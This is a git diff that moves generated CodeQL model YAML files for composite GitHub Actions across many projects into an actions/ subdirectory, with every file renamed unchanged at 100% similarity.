diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml rename to actions/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml rename to actions/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml rename to actions/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml rename to actions/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml 
diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/emberjs_data.model.yml rename to actions/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml rename to actions/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml rename to actions/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/erlang_otp.model.yml rename to actions/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml rename to actions/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expensify_app.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expensify_app.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expo_expo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expo_expo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml rename to actions/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml rename to actions/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_flow.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml rename to actions/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml rename to actions/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml rename to actions/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml rename to actions/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml rename to actions/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml rename to actions/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml rename to actions/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml rename to actions/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml rename to actions/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/github_ruby.model.yml rename to actions/ql/lib/ext/generated/composite-actions/github_ruby.model.yml diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml rename to actions/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml rename to actions/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml rename to actions/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/google_dagger.model.yml rename to actions/ql/lib/ext/generated/composite-actions/google_dagger.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml rename to actions/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml rename to actions/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml similarity index 100% rename from ql/lib/ext/generated/composite-actions/grote_transportr.model.yml rename to actions/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml 
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml
diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml
similarity index 100%
rename from ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml
rename to actions/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml
